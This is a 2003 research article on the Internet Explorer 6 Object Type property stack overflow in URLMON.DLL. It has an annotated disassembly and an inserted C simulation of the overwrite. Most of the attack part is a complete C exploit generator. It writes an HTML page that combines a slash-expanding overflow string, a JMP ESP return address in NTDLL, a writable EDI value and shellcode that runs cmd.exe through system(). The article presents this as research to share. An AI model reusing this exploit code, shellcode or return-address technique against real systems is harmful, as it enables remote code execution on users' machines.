[Practical] Internet Explorer Object Type Property Overflow


Research experience in Internet Explorer Object Type Property overflow

Creation time: 2003-06-08

Article attribute: original

Submitted by: Nanika (minjack.tw_at_yahoo.com.tw)


Nanika@seed.net.tw or minjack.tw@yahoo.com.tw

Test system: Windows XP SP1 Traditional Chinese Professional Edition

Internet Explorer 6.00.2800.1106 (xpsp1.020828-1920)

URLMON.DLL 6.00.2800.1170

MSVCRT.DLL 7.0.2600.1106 (XPSP1.020828-1920)

SHLWAPI.DLL 6.00.2800.1106 (xpsp1.020828-1920)

I am sharing some of the technical details I have worked out as a reference, so that everyone can discuss and research them and come up with more general methods.

Simple exploit:

Build an <object> element whose type attribute holds the overflow string and store it in an HTML file (only the element's text content is shown here):

CCCC

Open the constructed page with IE.

Overwriting RET with 44444444 (DDDD) changes the program's control flow.

It looks like a traditional stack overflow, but with a small FSO-like twist. The layout is:

[64 * /] [AAAA] [DDDD] [Arbitrary address (EDI)]

AAAA is the saved EBP value.

DDDD is the EIP (return address) value.

But the data that follows is not an ESP value; it is the EDI value.

With a carefully constructed Object Type string, this piece of data can be written to an arbitrary address.

However, the [arbitrary address] must not contain a 00 byte. If it does, the copy stops at the 00 and only part of the data is taken into the address, so the value that ends up there is limited to a certain range and cannot be controlled freely.

Positioning the [arbitrary address] is also difficult.

That means RET should use JMP ESP, or, following eEye Digital Security's advisory, JMP EDX or CALL EDX.

Either way, there are some problems positioning the shellcode inside the program.

Detailed analysis

The key function for the buffer overflow, in Urlmon.dll:

.text:1A441CF6 sub_1A441CF6 proc near          ; CODE XREF: .text:1A42590E p
.text:1A441CF6
.text:1A441CF6 var_104 = byte ptr -104h
.text:1A441CF6 arg_0   = dword ptr  8
.text:1A441CF6 arg_4   = dword ptr  0Ch
.text:1A441CF6 arg_8   = dword ptr  10h
.text:1A441CF6
.text:1A441CF6     push    ebp
.text:1A441CF7     mov     ebp, esp
.text:1A441CF9     sub     esp, 104h
.text:1A441CFF     mov     ecx, [ebp+arg_8]
.text:1A441D02     push    esi
.text:1A441D03     mov     esi, ecx
.text:1A441D05     mov     cl, [ecx]
.text:1A441D07     test    cl, cl
.text:1A441D09     lea     eax, [ebp+var_104]
.text:1A441D0F     mov     [ebp+var_104], cl
.text:1A441D15     jz      short loc_1A441D35
.text:1A441D17
.text:1A441D17 loc_1A441D17:                   ; CODE XREF: sub_1A441CF6+3D j
.text:1A441D17     cmp     cl, 2Fh
.text:1A441D1A     jnz     short loc_1A441D2B
.text:1A441D1C     mov     byte ptr [eax], 5Fh ; '/' (2F) is expanded to the four bytes "_2F_"
.text:1A441D1F     inc     eax
.text:1A441D20     mov     byte ptr [eax], 32h
.text:1A441D23     inc     eax
.text:1A441D24     mov     byte ptr [eax], 46h
.text:1A441D27     inc     eax
.text:1A441D28     mov     byte ptr [eax], 5Fh
.text:1A441D2B
.text:1A441D2B loc_1A441D2B:                   ; CODE XREF: sub_1A441CF6+24 j
.text:1A441D2B     inc     esi
.text:1A441D2C     mov     cl, [esi]
.text:1A441D2E     inc     eax
.text:1A441D2F     test    cl, cl
.text:1A441D31     mov     [eax], cl           ; copies the string into the 104h-byte buffer with no length check: this is the overflow
.text:1A441D33     jnz     short loc_1A441D17
.text:1A441D35
.text:1A441D35 loc_1A441D35:                   ; CODE XREF: sub_1A441CF6+1F j
.text:1A441D35     lea     eax, [ebp+var_104]
.text:1A441D3B     push    eax
.text:1A441D3C     mov     eax, [ebp+arg_4]
.text:1A441D3F     push    offset dword_1A441D5C
.text:1A441D44     dec     eax
.text:1A441D45     push    eax
.text:1A441D46     push    [ebp+arg_0]
.text:1A441D49     call    ds:wnsprintfA       ; because of this call, the dword after RET is not an ESP value: arg_0 is wnsprintfA's destination buffer, so to get past this point it must be overwritten with a writable address that contains no 00 byte
.text:1A441D4F     add     esp, 10h
.text:1A441D52     xor     eax, eax
.text:1A441D54     pop     esi
.text:1A441D55     leave
.text:1A441D56     retn    0Ch                 ; returns to DDDD
.text:1A441D56 sub_1A441CF6 endp
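To make the layout above concrete, here is an added simulation (my own code, not part of the original article and not URLMON.DLL's code). It runs the same '/' to "_2F_" expansion loop over the payload this article uses into a byte array laid out like sub_1A441CF6's frame (0x104-byte local, then saved EBP, RET, arg_0, arg_4, arg_8, offsets taken from the disassembly), reads back what lands in saved EBP, RET and arg_0, applies the no-00-byte constraint from the text, and shows a bounded form of the same loop that rejects the input. The addresses 77fb59cc and 01108030 are the ones the article uses; the arena, struct and function names are simulation stand-ins, not anything in IE.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Frame offsets from the disassembly: "sub esp,104h" gives a 260-byte local,
 * and saved EBP, RET and the three stack arguments follow it in memory. */
#define VAR_104_SIZE  0x104u
#define OFF_SAVED_EBP (VAR_104_SIZE)          /* [ebp]     */
#define OFF_RET       (VAR_104_SIZE + 4)      /* [ebp+4]   */
#define OFF_ARG_0     (VAR_104_SIZE + 8)      /* [ebp+8]   wnsprintfA destination */
#define ARENA_SIZE    0x200u                  /* simulated stack (stand-in) */

/* Vulnerable copy, mirroring loc_1A441D17..1A441D33: '/' becomes the four
 * bytes "_2F_", every other byte is copied as-is, and nothing limits the
 * output to the 0x104-byte buffer. Returns the expanded length. */
static size_t expand_unbounded(const unsigned char *src, unsigned char *dst)
{
    size_t o = 0;
    for (; *src; src++) {
        if (*src == '/') { memcpy(dst + o, "_2F_", 4); o += 4; }
        else dst[o++] = *src;
    }
    dst[o] = 0;
    return o;
}

/* Hardened form of the same loop: refuse input whose expansion would not
 * fit in cap bytes (terminator included) instead of writing past the end. */
static int expand_bounded(const unsigned char *src, unsigned char *dst, size_t cap)
{
    size_t o = 0;
    for (; *src; src++) {
        size_t need = (*src == '/') ? 4 : 1;
        if (o + need + 1 > cap) return -1;
        if (*src == '/') { memcpy(dst + o, "_2F_", 4); o += 4; }
        else dst[o++] = *src;
    }
    dst[o] = 0;
    return (int)o;
}

/* The constraint from the article: the string is NUL-terminated, so an
 * address with a 00 byte is cut short and only partly lands in its slot. */
static int has_nul_byte(uint32_t v)
{
    return !(v & 0xffu) || !(v & 0xff00u) || !(v & 0xff0000u) || !(v & 0xff000000u);
}

static void put_le32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)v;         p[1] = (unsigned char)(v >> 8);
    p[2] = (unsigned char)(v >> 16); p[3] = (unsigned char)(v >> 24);
}

static uint32_t get_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* The type-attribute value the article's exploit writes: 64 '/' (256 bytes
 * once expanded) plus "AAAA" fills the 0x104 buffer, "AAAA" lands in saved
 * EBP, ret in RET and arg0 in arg_0. Returns the unexpanded length, or 0
 * if either address would be truncated by a 00 byte. */
static size_t build_payload(unsigned char *out, uint32_t ret, uint32_t arg0)
{
    size_t n = 0;
    if (has_nul_byte(ret) || has_nul_byte(arg0)) return 0;
    memset(out, '/', 64);            n += 64;
    memcpy(out + n, "AAAA", 4);      n += 4;   /* completes the 0x104 buffer */
    memcpy(out + n, "AAAA", 4);      n += 4;   /* saved EBP                  */
    put_le32(out + n, ret);          n += 4;   /* RET -> JMP ESP             */
    put_le32(out + n, arg0);         n += 4;   /* arg_0 -> wnsprintfA dest   */
    out[n] = 0;
    return n;
}

/* What the vulnerable copy leaves in the control slots of the simulated frame. */
struct clobbered { uint32_t saved_ebp, ret, arg_0; size_t expanded; };

static struct clobbered simulate(uint32_t ret, uint32_t arg0)
{
    unsigned char stack[ARENA_SIZE], payload[128];
    struct clobbered c = {0, 0, 0, 0};
    memset(stack, 0xcc, sizeof stack);
    if (!build_payload(payload, ret, arg0)) return c;
    c.expanded  = expand_unbounded(payload, stack);   /* 80 bytes -> 272 */
    c.saved_ebp = get_le32(stack + OFF_SAVED_EBP);
    c.ret       = get_le32(stack + OFF_RET);
    c.arg_0     = get_le32(stack + OFF_ARG_0);
    return c;
}

/* 1 if the bounded loop rejects the same payload for a 0x104-byte buffer. */
static int bounded_rejects_payload(uint32_t ret, uint32_t arg0)
{
    unsigned char local[VAR_104_SIZE], payload[128];
    if (!build_payload(payload, ret, arg0)) return 0;
    return expand_bounded(payload, local, sizeof local) < 0;
}

int main(void)
{
    struct clobbered c = simulate(0x77fb59ccu, 0x01108030u);
    printf("expanded %zu bytes: saved EBP=%08x RET=%08x arg_0=%08x, bounded copy rejects=%d\n",
           c.expanded, c.saved_ebp, c.ret, c.arg_0,
           bounded_rejects_payload(0x77fb59ccu, 0x01108030u));
    return 0;
}
```

The point the simulation makes is that the attacker's 64 bytes of '/' become 256 bytes on the stack, so the input that reaches RET is far shorter than the buffer it overflows, and that an address with a 00 byte (0x00401000, say) cannot be placed in arg_0 at all because the copy stops at the NUL.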

To exploit this vulnerability with JMP ESP, you can build a string like the following:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <direct.h>
#include <sys/stat.h>
#include <windows.h>

unsigned char shellcode[] =
"\x8b\xc4"                  // mov eax, esp
"\x50"                      // push eax
"\xb8\x44\x80\xbf\x77"      // mov eax, SYSTEM_FUN_ADDR
"\xff\xd0"                  // call eax
"\x41\x41"                  // inc ecx, inc ecx (= NOP)
"\xb8\xfd\x98\xe5\x77"      // mov eax, EXITPROCESS_FUN_ADDR
"\xff\xd0"                  // call eax
"\x41\x41";                 // inc ecx, inc ecx (= NOP)

unsigned char eipaddr[5] =
"\xcc\x59\xfb\x77";         // JMP ESP in NTDLL.DLL at 77fb59cc; survives the WideChar conversion

unsigned char pad[5] =
"\x30\x80\x10\x01";         // EDI: writable address with no 00 byte

unsigned char buf[65] = "";
int i = 0;

int main(void)
{
    char path[256];
    FILE *bof;
    struct stat st;

    printf("\n\tBuffer overflow in Internet Explorer Object Type Property Overflow"
           "\n\tBig5 Unicode Exploit by Nanika"
           "\n\ttest WindowsXP_SP1 Big5 ver"
           "\n\tEmail: minjack.tw@yahoo.com.tw or Nanika@seed.net.tw\n");

    strcpy(path, "\\Explorer_exp_nanika");
    _mkdir(path);
    SetFileAttributes(path, FILE_ATTRIBUTE_READONLY);
    strcat(path, "\\exploit_ie_overflow.htm");
    if (stat(path, &st) == 0) {
        remove(path);            // just execute this program twice to remove the file :P
        exit(1);
    }
    bof = fopen(path, "w");
    // Opening of the <object> tag whose type attribute carries the overflow.
    // Assumption: only the attribute opening is restored here; the rest of the
    // original HTML string was cut off in the copy of this article.
    fputs("<object type=\"", bof);
    for (i = 0; i < (int)sizeof(buf) - 1; i++) {
        buf[i] = 0x2f;           // 64 '/' -> 256 bytes after expansion
    }
    buf[sizeof(buf) - 1] = 0;
    fprintf(bof, "%s", (char *)buf);        // buffer
    fputs("AAAA", bof);                     // pad (fills the 104h-byte buffer)
    fputs("AAAA", bof);                     // EBP
    fprintf(bof, "%s", (char *)eipaddr);    // RET -> JMP ESP [NTDLL]
    fprintf(bof, "%s", (char *)pad);        // EDI
    fputs("Aaaaaaaaa", bof);                // pad
    fprintf(bof, "%s", (char *)shellcode);  // shellcode
    fputs("\">CCCC", bof);
    fclose(bof);
    printf("\nExploit file: %s created.\nIf successful, exploit_ie_overflow.htm execs cmd.exe.\nRunning this exe again will delete the exploit file.\n", path);
    return 0;
}

Besides the two methods above (JMP ESP, and JMP EDX or CALL EDX), it is also possible to use the call to ds:wnsprintfA itself, since it writes the expanded string to an address we control. But that address must be positioned precisely, and the bytes must survive the character encoding.

Other ways of exploiting this vulnerability are left to more skilled researchers.

I hope you got something out of this article.

Thanks for taking the time to read it.

Please credit the original URL when reposting: https://www.9cbs.com/read-40959.html
